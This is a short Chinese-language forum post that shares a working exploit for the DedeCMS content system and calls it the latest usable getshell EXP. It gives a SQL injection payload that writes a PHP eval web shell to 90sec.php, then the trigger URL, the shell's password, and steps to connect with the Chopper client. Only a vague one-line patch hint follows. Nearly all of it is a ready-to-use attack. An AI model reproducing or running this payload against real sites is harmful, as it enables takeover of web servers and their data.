欢迎各位兄弟 发布技术文章
这里的技术是共享的
mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`
dedecms漏洞getshell EXP最新可用 2013-06-18 17:09:30
构 造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`
EXP:
成功增加。
访问http://www.xxx.org/plus/mytag_js.php?aid=9013
生成一句话木马.
菜刀连接 http://www.xxx.org/plus/90sec.php 密码 guige
测试OK。
临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的 include/dedesql.class.php
|